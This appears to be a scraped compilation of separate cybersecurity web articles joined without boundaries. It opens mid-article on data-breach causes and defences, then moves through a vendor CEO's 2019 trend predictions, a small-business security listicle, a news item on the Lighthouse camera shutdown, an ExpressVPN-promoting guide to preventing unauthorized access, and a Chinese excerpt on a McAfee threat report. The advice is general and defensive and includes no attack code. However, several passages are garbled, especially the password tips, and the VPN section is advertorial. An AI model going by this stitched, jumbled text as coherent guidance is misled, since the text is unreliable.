Internal actor all of the woes above can happen due to poor security or due to internal actors. Even if your network is well guarded, an admin can go rogue and leak the data. For many reasons, nonincluding financial. An privileged internal actor has access to perform SELECT *, can decrypt the backups, can pretend to be a trusted API partner.

How to prevent it? Good operational security. A single sentence like that may sound easy, but it’s not. I don’t have a full list of things that have to be in place to guard against internal breaches there are technical, organizational and legal measures to be taken. Have unmodifiable audit trail . Have your Intrusion prevention system (or logging solution) also detect anomalous internal behaviour. Have procedures that require two admins to work together in order to log in (e.g. split key) to the most. If the data is sensitive, do background checks on the privileged admins. And many more things that fall into the “operational security” umbrella.

Man-in-the-middle attacks MITM can be used to extract data from active users only. It works on website without HTTPS, or in case the attacker has somehow installed a wildcard certificate on the target machine (and before you say that’s too unlikely it happens way too often to be ignored). In case of a successful MITM attack, the attacker can extract all data that’s being transferred.

How to prevent it? First use HTTPS. Always. Redirect HTTP to HTTPS. Use HSTS . Use certificate pinning if you control the updates of the application (e.g. through an app store). The root certificate attack unfortunately cannot be circumvented. Sorry, just hope that your users haven’t installed such shitty software. Fortunately, this won’t lead to massive breaches, only data of active users that are being targeted may leak.

javascript injection / XSS if somehow an attacker can inject javascript into your website, they can collect data being entered. This is what happened in the recent British Airways breach . A remember a potential attack on NSW (Australia) elections, where the piwick analytics script was loaded from an external server that was vulnerable to a TLS downgrade attack which allowed an attacker to replace the script and thus interfere with the election registration website.

How to prevent it? Follow the XSS protection cheat sheet by OWASP . Don’t include scripts from dodgy third party domains. Make sure third party domains, including CDNs, have a good security level (e.g. run Qualys SSL test ).

Leaked passwords from other websites one of the issues with incorrect storage of passwords is password reuse. Even if you store passwords properly , a random online store may not and if your users use the same email and password there, an attacker may try to steal their data from your site. Not all accounts will be compromised, but the more popular your service is, the more accounts will be affected.

How to avoid it? There’s not much you can do to make other websites store passwords correctly. But you can encourage the use of pass phrases , you can encourage 2-factor authentication in case of sensitive data, or you can avoid having passwords at all and use an external OAuth/OpenID provider (this has its own issues, but they may be smaller than those of password reuse). Also have some rate-limiting in place so that a single IP (or an IP range) is not able to try and access many accounts consecutively.

Employees sending emails with unprotected excel sheets especially non-technical organizations and non-technical employees tend to just want to get their job done, so they may send large excel sheets with personal data to colleagues or partners in other companies. Then once someone’s email account or server is breached, the data gets breached as well.

How to prevent it? Have internal procedures against sending personal data in excel sheets, or at least have people zip them and send passwords through a side channel (messenger/sms). You can have an organization-wide software that scans outgoing emails for attachments with excel sheets that contain personal data and have these email blocked.

Data breaches are prevented by having good information security. And information security is hard. And it’s the right combination of security practices and security products that minimize the risk of incidents. Many organizations choose not to focus on infosec, as it’s not their core business or they estimate that the risk is worth it, viewing breaches, internal actors manipulating data and other incidents as something that can’t happen to them. Until it happens.

GUEST ESSAY: Top cybersecurity developments that can be expected to fully play o ...


From a certain perspective, 2018 hasn’t been as dramatic a cybersecurity year as 2017, in that we haven’t seen as many global pandemics like WannaCry.

Related: WannaCry signals worse things to come.

Still, Ransomware, zero-day exploits, and phishing attacks, were among the biggest threats facing IT security teams this year. 2018 has not been a d ull y ear as far as breaches. The cycle of exploit to discovery to weaponization has become shorter, and unfortunately, it has become more difficult to protect the enterprise network and the various devices connected to it.

In 2017, roughly 63% of organizations experienced an attempted ransomware attack, with 22% reporting these incidents occurred on a weekly basis . We expect to wind up with close statistics for 2018.

Here are a few trends I expect will dominate cyber security in 2019.

Security and Privacy Merge

Despite the fact that everyone is still trying to understand the new privacy landscape and perhaps because they haven’t fully grasped the new realities, everyone is paying attention. Perhaps it is our ever increasing focus on privacy in general and GDPR specifically.

Perhaps it is because more organizations will be working long hours to embrace the compliance measures that are needed to protect privacy that we won’t see a major lawsuit against a company. All we know is that we have seen an increase in companies seeking NAC solutions to keep up with all the new compliance regulations and it is very satisfying to hear that sigh of relief, when a company has implemented their solution.

AI + ML = forensics and investigations

Artificial Intelligence (AI) and Machine Learning (ML) are going to be implemented into the arena of practical usage in cyber security mainly for forensics and identification of culprits in cyber events. Investigating security events is costly both in terms of time and the expertise required.


We believe that AI and ML are well positioned to help in these investigations for obvious reasons, relating to computing power and specialized programming of what to look for and the ability to learn. AI and ML enable the clustering and analysis of monumental volumes of data that would otherwise be impossible to do within a reasonable amount of time even if you had the best trained minds in the business working on the investigation.

Ransomware more targeted attacks are expected against wealthy and famous individuals.

Social networks offer a world of insights and information on almost anyone who has an account. Unfortunately, it provides a lot of details that assist cyber offenders in the monetization of attacks (due to bitcoin) and the ease of performing spear phishing attacks all will be combined for a more targeted approach.

IoT security issues will increase

IoT will be deployed in more business usages and scenarios. The risk will rise and eventually this will cause more issues with a few headlines of devices that were used to hack networks.

The conversation Whose job it is to protect organizations in the public and private sector?

Nationwide attacks on large businesses will bring up the discussion of who should protect a country and a business from cyber security attacks. Should the state and country be active in the defense of the private sector? In the same respect, you wouldn’t expect a bank branch to deploy anti-missile defense systems against the possibility of an offending country.

At Portnox, we will continue to innovate our network security and risk control tools to provide solutions to all, empowering our customers with valuable, holistic solutions to protect their networks.

About the essayist : Ofer Amitai is CEO of Portnox, which supplies network access control, visibility, management and policy compliance systems designed to help today’s complex networks run smoothly and securely.

(Editor’s note: This article also appeared on Portnox Point)

Threat invasion: Secure your infrastructure


In this day and age of technology, we could all stand to secure our data more strongly. We’re in the age of one-click buying and complicated passwords. Our data should be more secure than ever, yet many businesses find themselves facing a cyber attack each year. Businesses both big and small are open to attack.

In fact, 58% of malware attack victims are small businesses. That means no organization is safe today. The best way to protect yourself, your employees, and your customers is to have a plan of action to secure your infrastructure. Keep reading to learn ways you can secure your own infrastructure today.

Understand the reality

First, you need to understand the reality of the threat. Cyber hackers are a reality of today. They’re here to stay, and they’re getting more sophisticated at breaking through company firewalls. Cyber attacks aren’t just limited to big businesses. While most of the recent attacks that gain the most attention have included large companies like Target and Neiman Marcus, they’re far from the only ones facing this threat.

The best way to protect your company is to start today. This isn’t a situation where you can blissfully look away and hope for the best. Take the time to familiarize yourself with the types of cyber fraud schemes and different threats happening right now. From there, follow the tips below.

SEE ALSO: How data science can answer cybersecurity challenges

Encrypt your data

You need to protect your data like it’s gold. Know what data is your most important data, or your crown jewels, and start there. Things like bank account numbers, credit card numbers, and social security numbers all need to be protected from threat first. This starts by turning to full-disk encryption tools. Not only is this incredibly simple, but it’s a good first step.

Don’t stop there. Ensure your company computers have automatic settings so they’ll log out quickly if not in use. It only takes a few minutes of inactivity to let hackers into your network. Don’t be caught with your information out in the open.

Restrict access

As we said, you need to protect your data. Restricting access to only those who need to access to top information is key. While most employees are well-intentioned, they might not be equipped on the best way to keep most information protected. Use software to keep your information in the hands of the right people only. Add intuitive access rights monitoring by SolarWinds to your system to ensure you can review access rights regularly.

Educate employees

Along with monitoring your access, create a culture in your office of education when it comes to cybersecurity. Talk openly about your concerns with your leaders. Make sure they’re aware of the latest trends in security and the most common attacks. Teaching your team the signs of a cyber attack can go a long way to protecting your business.

Security isn’t just one person’s responsibility. It’s everyone’s responsibility, and nobody is immune. Include both management, IT, and lower-level team members in your education program. Focus on continuous education for the upper-level employees with access to more information. Cyber security isn’t one-and-done, you’ll need ongoing updates and meetings to continuously make your team aware of any changes to your infrastructure.

Finally, create rules for employees focused on safety. Set guidelines for using email, browsing social media, and mobile devices at work. You want to create a culture of “safe browsing.” Teach your employees to be skeptical of any strange links and to think of strong passwords. These tips will also help them protect their own information on a regular basis.

SEE ALSO: Why developers with cybersecurity skills will be the biggest tech heroes of 2018

Secure your hardware

Many cyber attacks don’t even involve breaches of your system. Physical electronic equipment is also stolen, and it’s an easy way for hackers to gain valuable information. It’s easy to overlook securing your equipment, but that would be a mistake. Physically lock down your computer with Kensington lock ports. Even just a small tethered cord can go a long way towards protecting your devices.

While there’s no way to 100% protect your equipment from being stolen, this is a great way to deter any potential criminals. Involve employees in keeping your equipment safe. Have everyone lock server rooms, encrypt their digital information, and use cloud computing to store information. Another benefit of cloud computing is being able to track down any devices that are stolen.

Protect your infrastructure

Your company requires your guidance to stay protected against attacks. Cyber attacks are becoming more and more common. They’re the new normal in our digital age, and it’s up to all of us to take steps to deter these hackers from breaching your security.

Your reputation in on the line. Take action today with the tips above to secure your company infrastructure. It’s hard to reclaim employee and customer trust after losing your information to hackers. Don’t become another news story.

AI-powered security camera company Lighthouse shuts down


A new company calledLighthouse introduced an advanced security camera that can tell the difference between a person and a petback in 2017. It was a promising, Andy Rubin-backed project that managed to raise around $20 million. Unfortunately, it sounds like not a lot of people were willing to pay $300 for a security cam, even if it's powered by advanced AI and 3D sensing, because the company is shutting down operations. CEO Alex Teichman announced the closure on its website , where he admitted that Lighthouse didn't make enough money to keep the company going.

How to prevent unauthorized computer access


Unauthorized computer access implies the act of invading into a private computer without the owner’s consent. On the other hand, unauthorized computer use means the use of a computer’s data with malicious intentions and without permission from its owner. This act can be a minor or major offense depending on different jurisdictions.

With digital devices exponentially gaining popularity every single day, what also increase is the regular hacking incidents, data prying, unauthorized access, ransomware attacks among many others.

Beefing up security thus becomes the main option. Such scenarios usually arise when you use unsecured access to the internet without firewalls to protect against viruses and malware or leave your system unattended.

Most cybercriminals are aware of loopholes that computer users are unaware of, subjecting them to breach of personal data and the system.

This article is critical in making sure you protect your personal data and protect against malware as well. ExpressVPN details many ways and best tips that users can use to secure their computers against cyber rogues. Remember secure computer results to a peaceful mind.

Tips to help prevent unauthorized computer access 1. Strong Passwords

The unauthorized access to your computer’s operating system. This keeps unwanted people to your computer in the first instance. You may create additional accounts for guests so that your password remains personal.

Moreover, you should be Having a computer password should be a personal policy. It is a first step in stopping all changing your password more often and incorporate numbers and special characters to make it hard for guests to memorize. Your password should neither be written down nor shared with anyone.

2. Install antivirus or intrusion detecting software

Installing antivirus or spyware protection would prevent hackers’ from accessing private information from your computer. These add-ons can monitor your computer and notify you of any attempts that are or were being made by an intruder.

Installing these programs would prevent hackers from collecting your passwords or even credit card details among other important personal information. Always keep the software up-to-date and verify your software security at all times, do not let it make changes to your computer.

3. Using VPN to Boost Security and Privacy

Any information security professional would always advise users on strengthening their computer’s data privacy and security by setting up a virtual private network. VPN creates a connection between your computer and a secure server increasing security of the user’s web session, financial transactions, transmitted data, and online personal information. ExpressVPN reduces the risk of your connection being hijacked whether it is on a public Wi-Fi or internet providers who snoop and sell your personal data to advertisers based on your browsing trends and habits.

Moreover, ExpressVPN protects against identity theft by hiding IP addresses, blocking third parties from tracking, bypassing firewalls and accessing online contents privately without censorship. Some key uses of VPN include:-

Connecting remotely to an organization’s private network; Protecting your data when using public Wi-Fi the data; Bit Torrent piracy hiding; Preventing government surveillance or censorship; and Accessing sites such as Netflix library from restricted countries

Read more about ExpressVPN here .

4. Handling your email think before you click

E-mail has become one of the most common ways of attacking a computer. By being able to identify threats sent via email links and attachments would help you protect your computer and data. The following are threats that can be encountered:-

Phishing Attachments You should never run or open e-mail attachments which are sent from addresses that are not familiar to you. Spyware, viruses and other forms of malware are can be distributed through e-mails containing attachments.

Phishing This is an e-mail that seems to be from an official company like your personal bank indicating that you need to log onto the banks’ web link confirm your account settings. However, such e-mails are sites built to steal personal data such as credit card information, passwords, and many other details.

5. Get a software or hardware firewall

It is advised that all computers should have a firewall solution. Firewalls protect your computer in two ways:-

Hardware firewall This is a physical device which connects to your home/personal network. A router can be used as a firewall solution.

Software firewall This is a software program which is installed on a computer to help protect against unauthorized outgoing and incoming data. Note that this protects a specific computer only.

6. Always lock your computer

If you are stepping away from your desk and you want to keep your computer on, make sure you lock it so that it may require a password once someone wishes to access it.

7. Biometric Devices

These are devices that authenticate users ‘identity by using their personal characteristics like fingerprints.

8.Install all Security Patches

Do not ignore the security pop-ups, make the updates to protect your data.

9. Maintain a Proper Backup of your Data

This would come in handy, in case of a worst-case event like an attack that would result in data loss. Make backup early and often.

10. Make sure you always verify your software security Conclusion

Since there are so many risks in the cyberspace and people can easily get your data without your permission, it is important to know that you have the primary responsibility is to protect yourself. There are so many tips that can help keep you safe like using firewalls, great VPNs like Express VPN, having strong passwords, not sharing your password and many others. Following these tips will prevent you from having to suffer losses or compromising your privacy.



网络安全公司McAfee最新发布的2018年三季度全球网络安全报告(获取报告原文请关注IT经理网微信号ctociocom 后台回复:mcafee2018)显示:第三季度物联网恶意软件增长了73%,出人意料的是虽然加密货币市场经历了雪崩般的暴跌,但加密货币挖矿恶意软件却保持着71%的强劲增速。








三季度美洲的数据泄漏事件下降了18%,亚太地区下降了22%,但 欧洲增长了38% 。



勒索软件即服务(RaaS):勒索软件仍然很受欢迎,过去四个季度增长了45%,并且对Gandcrab等领先的RaaS家族的地下论坛产生了浓厚的兴趣。自2017年第四季度以来,独立的勒索软件家族数量有所下降,但相互之间的合作关系有所增加 。例如第三季度GandCrab勒索软件和加密服务NTCrypt之间的合作关系。这种合作伙伴关系和联盟计划提高了感染率和为RaaS客户提供的服务水平。

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